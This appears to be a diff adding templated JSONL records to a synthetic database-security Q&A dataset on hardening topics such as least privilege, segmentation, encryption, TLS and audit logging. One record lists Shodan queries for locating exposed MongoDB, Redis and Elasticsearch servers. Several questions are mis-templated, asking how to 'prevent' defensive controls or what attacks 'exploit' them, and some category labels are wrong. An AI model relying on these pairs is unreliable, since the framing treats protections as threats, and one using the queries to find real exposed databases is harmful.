+{"id": "trtp-509c15d88a95", "instruction": "What is the syntax for NoSQL Database Exposure?", "output": "Example of NoSQL Database Exposure:\n\n```sql\n# Shodan searches for exposed databases:\n# MongoDB: port:27017 product:MongoDB\n# Redis: port:6379 product:Redis\n# Elasticsearch: port:9200 product:Elasticsearch\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-nosql-nosql-database-exposure", "license": "original", "retrieved_at": "2025-12-17T19:35:42.174205Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.174319Z", "updated_at": "2025-12-17T19:35:42.174319Z"}
+{"id": "trtp-d881da7b4121", "instruction": "What do security professionals need to know about Database Principle of Least Privilege?", "output": "Least privilege ensures database accounts have only the minimum permissions necessary for their function. Application accounts should never have DBA privileges. Separate accounts for different functions limits breach impact.\n\nSecurity Relevance: Overprivileged accounts amplify breach impact. SQL injection against a DBA account enables complete database compromise. Least privilege contains damage from compromised credentials.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176047Z", "updated_at": "2025-12-17T19:35:42.176047Z"}
+{"id": "trtp-6a27b209e6e4", "instruction": "What elements make up Database Principle of Least Privilege?", "output": "Database Principle of Least Privilege consists of the following key components:\n\n- Account permission granularity\n- Role-based access control\n- Application vs admin accounts\n- Schema-level permissions\n- Object-level permissions", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176067Z", "updated_at": "2025-12-17T19:35:42.176067Z"}
+{"id": "trtp-432bd4bbc3c0", "instruction": "From a security perspective, why should defenders understand Database Principle of Least Privilege?", "output": "Overprivileged accounts amplify breach impact. SQL injection against a DBA account enables complete database compromise. Least privilege contains damage from compromised credentials.\n\nCommon attack vectors include:\n- Exploiting overprivileged application accounts\n- Privilege escalation through excessive grants\n- Lateral movement via shared credentials\n- Data modification with write access", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176083Z", "updated_at": "2025-12-17T19:35:42.176083Z"}
+{"id": "trtp-c809553cc4f6", "instruction": "What attacks exploit Database Principle of Least Privilege?", "output": "Attack techniques involving Database Principle of Least Privilege:\n\n- Exploiting overprivileged application accounts\n- Privilege escalation through excessive grants\n- Lateral movement via shared credentials\n- Data modification with write access\n\nDefenders can detect these attacks by:\n- Privilege audit reports\n- Permission change monitoring\n- Account activity analysis", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176097Z", "updated_at": "2025-12-17T19:35:42.176097Z"}
+{"id": "trtp-ad1c2e07c7c9", "instruction": "What indicators reveal malicious activity involving Database Principle of Least Privilege?", "output": "Methods for detecting Database Principle of Least Privilege attacks or anomalies:\n\n- Privilege audit reports\n- Permission change monitoring\n- Account activity analysis\n- Unused privilege identification", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176109Z", "updated_at": "2025-12-17T19:35:42.176109Z"}
+{"id": "trtp-5e845b072dc5", "instruction": "What are best practices for preventing Database Principle of Least Privilege?", "output": "Security controls and preventive measures for Database Principle of Least Privilege:\n\n- Grant minimum required privileges\n- Use read-only accounts where possible\n- Separate application and admin accounts\n- Regular privilege reviews\n- Remove unused permissions\n\nOverprivileged accounts amplify breach impact. SQL injection against a DBA account enables complete database compromise. Least privilege contains damage from compromised credentials.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176122Z", "updated_at": "2025-12-17T19:35:42.176122Z"}
+{"id": "trtp-083227b0a677", "instruction": "What is the syntax for Database Principle of Least Privilege?", "output": "Example of Database Principle of Least Privilege:\n\n```sql\n-- Create limited application account (PostgreSQL):\nCREATE USER app_readonly WITH PASSWORD 'strong_pass';\nGRANT CONNECT ON DATABASE production TO app_readonly;\nGRANT USAGE ON SCHEMA public TO app_readonly;\nGRANT SELECT ON ALL TABLES IN SCHEMA public TO app_readonly;\n\n-- Revoke unnecessary privileges:\nREVOKE ALL ON SCHEMA information_schema FROM app_readonly;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-principle-of-least-privilege", "license": "original", "retrieved_at": "2025-12-17T19:35:42.176018Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.176133Z", "updated_at": "2025-12-17T19:35:42.176133Z"}
+{"id": "trtp-9cfb5428038d", "instruction": "What do security professionals need to know about Database Network Segmentation?", "output": "Network segmentation isolates databases from direct internet access and limits lateral movement. Databases should reside in protected network segments with controlled access from application tiers only.\n\nSecurity Relevance: Internet-exposed databases are trivially exploited. Network segmentation prevents direct attacks and limits lateral movement after web tier compromise. Defense in depth protects data.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177915Z", "updated_at": "2025-12-17T19:35:42.177915Z"}
+{"id": "trtp-2aea73b7f6e1", "instruction": "What are the key components of Database Network Segmentation?", "output": "Database Network Segmentation consists of the following key components:\n\n- Database network segments/VLANs\n- Firewall rules\n- Application tier access only\n- Management network separation\n- Network access control lists", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177936Z", "updated_at": "2025-12-17T19:35:42.177936Z"}
+{"id": "trtp-154a719b6cff", "instruction": "Why is Database Network Segmentation important for database security?", "output": "Internet-exposed databases are trivially exploited. Network segmentation prevents direct attacks and limits lateral movement after web tier compromise. Defense in depth protects data.\n\nCommon attack vectors include:\n- Direct internet exploitation of exposed DB\n- Lateral movement from compromised web server\n- Database scanning from DMZ\n- Unauthorized management access", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177950Z", "updated_at": "2025-12-17T19:35:42.177950Z"}
+{"id": "trtp-a760e92a8cac", "instruction": "What are common attack techniques involving Database Network Segmentation?", "output": "Attack techniques involving Database Network Segmentation:\n\n- Direct internet exploitation of exposed DB\n- Lateral movement from compromised web server\n- Database scanning from DMZ\n- Unauthorized management access\n\nDefenders can detect these attacks by:\n- Network traffic analysis\n- Unauthorized connection attempts\n- Port scanning indicators", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177964Z", "updated_at": "2025-12-17T19:35:42.177964Z"}
+{"id": "trtp-0afdf45ad005", "instruction": "How can security teams detect attacks related to Database Network Segmentation?", "output": "Methods for detecting Database Network Segmentation attacks or anomalies:\n\n- Network traffic analysis\n- Unauthorized connection attempts\n- Port scanning indicators\n- Cross-segment access patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177975Z", "updated_at": "2025-12-17T19:35:42.177975Z"}
+{"id": "trtp-7eea439f9699", "instruction": "What are best practices for preventing Database Network Segmentation?", "output": "Security controls and preventive measures for Database Network Segmentation:\n\n- Place databases in isolated segments\n- Firewall rules allowing only app tier\n- Bind to internal interfaces only\n- Separate management network\n- Regular network architecture review\n\nInternet-exposed databases are trivially exploited. Network segmentation prevents direct attacks and limits lateral movement after web tier compromise. Defense in depth protects data.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177988Z", "updated_at": "2025-12-17T19:35:42.177988Z"}
+{"id": "trtp-ead09c4f3648", "instruction": "What does Database Network Segmentation look like in SQL?", "output": "Example of Database Network Segmentation:\n\n```sql\n# Firewall rules for database tier:\n# Allow from app servers only\niptables -A INPUT -p tcp -s 10.0.1.0/24 --dport 5432 -j ACCEPT\niptables -A INPUT -p tcp --dport 5432 -j DROP\n\n# PostgreSQL: bind to internal interface only\nlisten_addresses = '10.0.2.10'\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-network-segmentation", "license": "original", "retrieved_at": "2025-12-17T19:35:42.177885Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.177998Z", "updated_at": "2025-12-17T19:35:42.177998Z"}
+{"id": "trtp-7d7c23cf762c", "instruction": "What do security professionals need to know about Database Encryption at Rest?", "output": "Encryption at rest protects database files from unauthorized access through filesystem or physical media theft. Transparent Data Encryption (TDE), file-level encryption, and full disk encryption provide different protection levels.\n\nSecurity Relevance: Data at rest encryption protects against physical theft, unauthorized backup access, and filesystem-level attacks. Without encryption, database files can be read directly, bypassing authentication.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179880Z", "updated_at": "2025-12-17T19:35:42.179880Z"}
+{"id": "trtp-ce922c7976e3", "instruction": "What are the key components of Database Encryption at Rest?", "output": "Database Encryption at Rest consists of the following key components:\n\n- Transparent Data Encryption (TDE)\n- Column-level encryption\n- File-system encryption\n- Full disk encryption\n- Key management", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179900Z", "updated_at": "2025-12-17T19:35:42.179900Z"}
+{"id": "trtp-aa2ee779d478", "instruction": "From a security perspective, why should defenders understand Database Encryption at Rest?", "output": "Data at rest encryption protects against physical theft, unauthorized backup access, and filesystem-level attacks. Without encryption, database files can be read directly, bypassing authentication.\n\nCommon attack vectors include:\n- Database file theft and direct reading\n- Backup media theft\n- Decommissioned hardware analysis\n- Cloud storage bucket exposure", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179916Z", "updated_at": "2025-12-17T19:35:42.179916Z"}
+{"id": "trtp-538cafc371bc", "instruction": "How do attackers abuse Database Encryption at Rest?", "output": "Attack techniques involving Database Encryption at Rest:\n\n- Database file theft and direct reading\n- Backup media theft\n- Decommissioned hardware analysis\n- Cloud storage bucket exposure\n\nDefenders can detect these attacks by:\n- Encryption status monitoring\n- Key access auditing\n- Unauthorized file access attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179930Z", "updated_at": "2025-12-17T19:35:42.179930Z"}
+{"id": "trtp-036cca879eda", "instruction": "What should analysts look for when monitoring for Database Encryption at Rest?", "output": "Methods for detecting Database Encryption at Rest attacks or anomalies:\n\n- Encryption status monitoring\n- Key access auditing\n- Unauthorized file access attempts\n- Backup encryption verification", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179941Z", "updated_at": "2025-12-17T19:35:42.179941Z"}
+{"id": "trtp-8c9ab2cbbfc8", "instruction": "How can organizations protect against Database Encryption at Rest?", "output": "Security controls and preventive measures for Database Encryption at Rest:\n\n- Enable TDE for databases\n- Encrypt sensitive columns additionally\n- Secure key management\n- Encrypt backups separately\n- Verify encryption on all environments\n\nData at rest encryption protects against physical theft, unauthorized backup access, and filesystem-level attacks. Without encryption, database files can be read directly, bypassing authentication.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179953Z", "updated_at": "2025-12-17T19:35:42.179953Z"}
+{"id": "trtp-4890394a8303", "instruction": "What is the syntax for Database Encryption at Rest?", "output": "Example of Database Encryption at Rest:\n\n```sql\n-- SQL Server TDE:\nUSE master;\nCREATE MASTER KEY ENCRYPTION BY PASSWORD = 'StrongPassword!';\nCREATE CERTIFICATE TDECert WITH SUBJECT = 'TDE Certificate';\nUSE production;\nCREATE DATABASE ENCRYPTION KEY WITH ALGORITHM = AES_256\n  ENCRYPTION BY SERVER CERTIFICATE TDECert;\nALTER DATABASE production SET ENCRYPTION ON;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-encryption-at-rest", "license": "original", "retrieved_at": "2025-12-17T19:35:42.179850Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.179964Z", "updated_at": "2025-12-17T19:35:42.179964Z"}
+{"id": "trtp-3f16da287a7c", "instruction": "What do security professionals need to know about Database Connection Encryption (TLS)?", "output": "TLS encrypts database connections, preventing credential interception and data eavesdropping. All database connections should require TLS, especially across networks and from application servers.\n\nSecurity Relevance: Unencrypted database connections expose credentials and data to network interception. Man-in-the-middle attacks can modify queries and results. TLS is essential for network security.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181688Z", "updated_at": "2025-12-17T19:35:42.181688Z"}
+{"id": "trtp-c5c7fbb05050", "instruction": "What are the key components of Database Connection Encryption (TLS)?", "output": "Database Connection Encryption (TLS) consists of the following key components:\n\n- TLS certificate configuration\n- Client certificate authentication\n- Cipher suite selection\n- Certificate validation\n- Protocol version enforcement", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181709Z", "updated_at": "2025-12-17T19:35:42.181709Z"}
+{"id": "trtp-c9b74d086d23", "instruction": "What security risks are associated with Database Connection Encryption (TLS)?", "output": "Unencrypted database connections expose credentials and data to network interception. Man-in-the-middle attacks can modify queries and results. TLS is essential for network security.\n\nCommon attack vectors include:\n- Credential sniffing on network\n- Man-in-the-middle query injection\n- Data interception\n- Downgrade attacks", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181724Z", "updated_at": "2025-12-17T19:35:42.181724Z"}
+{"id": "trtp-c0bef782c80d", "instruction": "What attacks exploit Database Connection Encryption (TLS)?", "output": "Attack techniques involving Database Connection Encryption (TLS):\n\n- Credential sniffing on network\n- Man-in-the-middle query injection\n- Data interception\n- Downgrade attacks\n\nDefenders can detect these attacks by:\n- Unencrypted connection attempts\n- Certificate validation failures\n- TLS version monitoring", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181738Z", "updated_at": "2025-12-17T19:35:42.181738Z"}
+{"id": "trtp-806e346a2c6f", "instruction": "What should analysts look for when monitoring for Database Connection Encryption (TLS)?", "output": "Methods for detecting Database Connection Encryption (TLS) attacks or anomalies:\n\n- Unencrypted connection attempts\n- Certificate validation failures\n- TLS version monitoring\n- Network traffic analysis", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181749Z", "updated_at": "2025-12-17T19:35:42.181749Z"}
+{"id": "trtp-65952a4c3c77", "instruction": "How can organizations protect against Database Connection Encryption (TLS)?", "output": "Security controls and preventive measures for Database Connection Encryption (TLS):\n\n- Require TLS for all connections\n- Use TLS 1.2 or higher\n- Proper certificate management\n- Client certificate authentication where feasible\n- Regular cipher suite review\n\nUnencrypted database connections expose credentials and data to network interception. Man-in-the-middle attacks can modify queries and results. TLS is essential for network security.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181762Z", "updated_at": "2025-12-17T19:35:42.181762Z"}
+{"id": "trtp-536b7e526bc3", "instruction": "Provide a code example for Database Connection Encryption (TLS).", "output": "Example of Database Connection Encryption (TLS):\n\n```sql\n# PostgreSQL TLS configuration (postgresql.conf):\nssl = on\nssl_cert_file = 'server.crt'\nssl_key_file = 'server.key'\nssl_ca_file = 'ca.crt'\nssl_min_protocol_version = 'TLSv1.2'\n\n# Force TLS in pg_hba.conf:\nhostssl all all 0.0.0.0/0 scram-sha-256\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-connection-encryption-tls", "license": "original", "retrieved_at": "2025-12-17T19:35:42.181658Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.181773Z", "updated_at": "2025-12-17T19:35:42.181773Z"}
+{"id": "trtp-461f45b58e87", "instruction": "Explain Database Audit Logging from a security perspective.", "output": "Audit logging records database activities for security monitoring, incident response, and compliance. Comprehensive logging captures authentication, authorization, data access, and administrative operations.\n\nSecurity Relevance: Audit logs enable detection of attacks, investigation of incidents, and compliance verification. Without logging, breaches go undetected and investigations lack evidence. Log protection prevents tampering.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183486Z", "updated_at": "2025-12-17T19:35:42.183486Z"}
+{"id": "trtp-206be0e690cc", "instruction": "What elements make up Database Audit Logging?", "output": "Database Audit Logging consists of the following key components:\n\n- Authentication event logging\n- Query/statement logging\n- DDL operation logging\n- Privilege change logging\n- Log protection and retention", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183506Z", "updated_at": "2025-12-17T19:35:42.183506Z"}
+{"id": "trtp-2fdb2672806c", "instruction": "Why is Database Audit Logging important for database security?", "output": "Audit logs enable detection of attacks, investigation of incidents, and compliance verification. Without logging, breaches go undetected and investigations lack evidence. Log protection prevents tampering.\n\nCommon attack vectors include:\n- Attacks going undetected without logging\n- Audit log tampering\n- Log file deletion\n- Overwhelming logs to hide activity", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183521Z", "updated_at": "2025-12-17T19:35:42.183521Z"}
+{"id": "trtp-69c65fd1093a", "instruction": "What threats are associated with Database Audit Logging?", "output": "Attack techniques involving Database Audit Logging:\n\n- Attacks going undetected without logging\n- Audit log tampering\n- Log file deletion\n- Overwhelming logs to hide activity\n\nDefenders can detect these attacks by:\n- Log analysis for suspicious patterns\n- Authentication failure monitoring\n- Privilege change alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183535Z", "updated_at": "2025-12-17T19:35:42.183535Z"}
+{"id": "trtp-a2ce84f11818", "instruction": "How do you detect exploitation of Database Audit Logging?", "output": "Methods for detecting Database Audit Logging attacks or anomalies:\n\n- Log analysis for suspicious patterns\n- Authentication failure monitoring\n- Privilege change alerts\n- Anomalous query patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183547Z", "updated_at": "2025-12-17T19:35:42.183547Z"}
+{"id": "trtp-aa5edd0e8612", "instruction": "What security controls mitigate Database Audit Logging risks?", "output": "Security controls and preventive measures for Database Audit Logging:\n\n- Enable comprehensive audit logging\n- Ship logs to SIEM/central logging\n- Protect log integrity\n- Define retention policies\n- Regular log review\n\nAudit logs enable detection of attacks, investigation of incidents, and compliance verification. Without logging, breaches go undetected and investigations lack evidence. Log protection prevents tampering.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183559Z", "updated_at": "2025-12-17T19:35:42.183559Z"}
+{"id": "trtp-55668f3a4bcb", "instruction": "What is the syntax for Database Audit Logging?", "output": "Example of Database Audit Logging:\n\n```sql\n-- PostgreSQL audit logging:\n-- postgresql.conf:\nlog_connections = on\nlog_disconnections = on\nlog_statement = 'ddl'\nlog_line_prefix = '%t [%p]: user=%u,db=%d,app=%a,client=%h '\n\n-- pgaudit extension for detailed auditing:\nCREATE EXTENSION pgaudit;\nSET pgaudit.log = 'read, write, ddl';\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-audit-logging", "license": "original", "retrieved_at": "2025-12-17T19:35:42.183447Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.183570Z", "updated_at": "2025-12-17T19:35:42.183570Z"}
+{"id": "trtp-2ca518676165", "instruction": "What is Database Backup Security and why is it important for database security?", "output": "Database backups contain all the sensitive data of the production database. Backup security includes encryption, access control, testing, and secure storage. Compromised backups enable complete data theft.\n\nSecurity Relevance: Backups are often less protected than production databases but contain the same sensitive data. Attackers target backups for easier data exfiltration. Unencrypted backups on shared storage are common vulnerabilities.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185404Z", "updated_at": "2025-12-17T19:35:42.185404Z"}
+{"id": "trtp-c9b38ab14d2e", "instruction": "Describe the technical aspects of Database Backup Security.", "output": "Database Backup Security consists of the following key components:\n\n- Backup encryption\n- Backup storage security\n- Access control for backups\n- Backup testing and verification\n- Retention and destruction", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185424Z", "updated_at": "2025-12-17T19:35:42.185424Z"}
